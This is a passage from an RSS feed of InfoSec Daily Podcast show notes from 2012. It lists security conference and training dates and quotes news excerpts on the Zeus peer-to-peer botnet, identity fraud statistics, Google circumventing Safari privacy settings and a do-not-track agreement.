	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open! &#160;If you have some Anti-Forensics talks, that would be awesome.
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.siliconrepublic.com/strategy/item/25941-high-numbers-of-irish-firms
	Almost two-thirds of Irish businesses in a survey said staff members have sent confidential business information over email.
	Of the total 63pc, 35pc had sent out proprietary company details by email, and 28pc had sent customers&#8217; financial or identity information the same way.
	Almost one in four respondents (23pc) said they had to discipline an employee for sending confidential business information over email, and in 4pc of cases such an incident led to dismissal.
	Some 200 Irish IT executives were polled for the survey carried out by iReach on behalf of the IT distributor DataSolutions. The research was split into two parts, covering intrusion prevention from external threats and data loss caused by the accidental or intentional actions of internal personnel.
	The survey also suggests that as many as 14,000 Irish businesses have had their data compromised. The figure was arrived at by using the total number of active Irish enterprises as registered with the Central Statistics Office and the survey finding that 7pc of respondents admitted their data had been compromised.
	In this case, respondents were asked the question: &#8220;There have been a lot of high-profile hacks recently &#8211; has your data ever been compromised or lost?&#8221;
	&#8230;.
	Source: http://www.darkreading.com/authentication/167901072/security/encryption/232601373/survey-post-it-notes-spreadsheets-used-to-manage-digital-certificates.html
	Certificate authorities (CA&#39;s) are still reeling from the wave of hacks against them over the past year. And it turns out their most of their customers are struggling to keep on top of their SSL certificates despite the increased threats. A new survey found that 54 percent [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 602 &#8211; Zeus More Powerful, Identity Theft, Mobile Malware, Google Tracks, Do Not Track Button</title>
		<link>http://www.isdpodcast.com/episode-602-zeus-more-powerful-identity-theft-mobile-malware-google-tracks-do-not-track-button</link>
		<comments>http://www.isdpodcast.com/episode-602-zeus-more-powerful-identity-theft-mobile-malware-google-tracks-do-not-track-button#comments</comments>
		<pubDate>Fri, 24 Feb 2012 01:55:36 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3542</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 602 for February 23, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, David Kennedy, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan. &#160; Announcements: Social Engineering Training When: March 5-9, 2012 Where: Seattle, Washington When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK When: &#160;November 12-16, [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 602 for February 23, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, David Kennedy, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open! &nbsp;If you have some Anti-Forensics talks, that would be awesome.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span><br />
	&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.net-security.org/malware_news.php?id=2009"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.net-security.org/malware_news.php?id=2009</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The latest build of the Zeus/SpyEye malware shows a change that could very well hamper the security researchers&#39; ability to take down the botnets using it and to find out the criminals behind them.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Symantec researchers, a previous build already moved towards replacing the bot-to-C&amp;C system with peer-to-peer capabilities so that the bots receive configuration files from other bots, and this new one has finalized the transition.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This means that every peer in the botnet can act as a C&amp;C server, while none of them really are one,&quot; say the researchers. &quot;Bots are now capable of downloading commands, configuration files, and executables from other bots &#8211; every compromised computer is capable of providing data to the other bots. We don&rsquo;t yet know how the stolen data is communicated back to the attackers, but it&rsquo;s possible that such data is routed through the peers until it reaches a drop zone controlled by the attackers.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apart from making such a botnet practically immune to a takedown, the move has also the added benefit of making the tracking and blocking of IP addresses of the C&amp;C servers obsolete.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In order for the peers to act as a C&amp;C server of sorts, the bot now includes nGinx, an open source Web server, which makes it capable of handling HTTP requests. And those requests are not longer used only for exchanging configuration files, but also to make bots download additional malware (fake AV) and software (proxy engine).</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.darkreading.com/security/privacy/232601307/study-users-of-social-networks-smartphones-more-likely-to-be-fraud-victims.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/security/privacy/232601307/study-users-of-social-networks-smartphones-more-likely-to-be-fraud-victims.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you&#39;re a heavy user of social networks or smartphones, you&#39;re significantly more likely to be the victim of identity fraud, according to a study published Wednesday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Consumers who actively engage with social media and utilize a smartphone were found to have a disproportionate rate of identity fraud compared with consumers who do not engage in these media,&quot; says Javelin Strategy &amp; Research in its 2012 identity fraud study, The 2012 Identity Fraud Report: Social Media And Mobile Forming The New Fraud Frontier.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The frequency of identity fraud increased by 13 percent in 2011, according to the study &#8212; more than 11.6 million adults fell victim in the United States alone, according to the study. The average dollar amount stolen was about the same as the previous year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Consumers whose personal information has been compromised by corporate data breaches were the most likely victims, Javelin says. Consumers who have received notification of a data breach affecting their personal data are 9.5 times more likely to experience identity fraud than those who don&#39;t receive such a notification.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For the first time in its annual study, Javelin also tracked users&#39; online behavior to see its impact on identity fraud. &quot;LinkedIn, Google+, Twitter and Facebook users had the highest incidence of fraud, although there is no proof of direct causation,&quot; the study says. The survey also found that despite warnings that social networks are a great resource for fraudsters, consumers are still sharing a significant amount of personal information that might be used to authenticate their identities.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.appleinsider.com/articles/12/02/17/google_reportedly_ignoring_safari_users_privacy_settings_to_better_track_its_ads.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appleinsider.com/articles/12/02/17/google_reportedly_ignoring_safari_users_privacy_settings_to_better_track_its_ads.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://blogs.msdn.com/b/ie/archive/2012/02/20/google-bypassing-user-privacy-settings.aspx"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.msdn.com/b/ie/archive/2012/02/20/google-bypassing-user-privacy-settings.aspx</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to an</span><a href="http://online.wsj.com/article_email/SB10001424052970204880404577225380456599176-lMyQjAxMTAyMDEwNjExNDYyWj.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">investigation</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> by </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wall Street Journal</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Google and at least three other smaller web ad networks (Vibrant Media, Media Innovation Group and Gannett PointRoll), have purposely overridden Safari&#39;s browser privacy settings using code that misrepresents its ads as being a user-initiated form submission.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The default settings of Safari block cookies &quot;from third parties and advertisers,&quot; a setting that is supposed to only allow sites that the user is directly interacting with to save a cookie (client side data that remote web servers can later access in subsequent visits).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Advertisers like Google save cookies on users&#39; browsers so they can track their browsing habits across the various websites they place their ads on, and these &quot;third party&quot; cookies are expressly what the setting is designed to block.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The report notes that &quot;Google added coding to some of its ads that made Safari think that a person was submitting an invisible form to Google. Safari would then let Google install a cookie on the phone or computer.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While the cookies were set to expire with a day or two, the report states that a &quot;technical quirk in Safari&quot; subsequently &quot;allows companies to easily add more cookies to a user&#39;s computer once the company has installed at least one cookie,&quot; resulting in &quot;extensive tracking of Safari users.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google&#39;s hack around Safari&#39;s browser privacy settings was discovered by Stanford researcher Jonathan Mayer and &quot;independently confirmed by a technical adviser to the Journal, Ashkan Soltani,&quot; who the site reported to have found Google&#39;s circumvention code enabling tracking for about a third of the web&#39;s top 100 sites for either desktop users or iOS users.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wall Street Journal</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> named a wide variety of top websites, including Google&#39;s own YouTube, Aol, About.com, Comcast, NYTimes, YellowPages.com, Match.com and Fandango, as testing positive for Google&#39;s circumvention code, but noted that &quot;there is no indication that any of the sites knew of the code&quot; that Google was placing on their pages as a third party web advertising network.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://online.wsj.com/article/SB10001424052970203960804577239774264364692.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://online.wsj.com/article/SB10001424052970203960804577239774264364692.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A coalition of Internet giants including Google Inc. has agreed to support a do-not-track button to be embedded in most Web browsers&mdash;a move that the industry had been resisting for more than a year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The reversal is being announced as part of the White House&#39;s call for Congress to pass a &quot;privacy bill of rights,&quot; that will give people greater control over the personal data collected about them.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The industry has been caught in a number of high-profile privacy slip-ups. Facebook Inc. recently agreed to settle charges by the U.S. government that some of its privacy practices had been unfair and deceptive to users. And last week, Google acknowledged it had been circumventing the privacy settings of people using Apple Inc.&#39;s Web-browsing software on their iPhones, iPads and computers. It stopped the practice after being contacted by The Wall Street Journal.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The new do-not-track button isn&#39;t going to stop all Web tracking. The companies have agreed to stop using the data about people&#39;s Web browsing habits to customize ads, and have agreed not to use the data for employment, credit, health-care or insurance purposes. But the data can still be used for some purposes such as &quot;market research&quot; and &quot;product development&quot; and can still be obtained by law enforcement officers.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The do-not-track button also wouldn&#39;t block companies such as Facebook Inc. from tracking their members through &quot;Like&quot; buttons and other functions.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It&#39;s a good start,&quot; said Christopher Calabrese, legislative counsel at the American Civil Liberties Union. &quot;But we want you to be able to not be tracked at all if you so choose.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
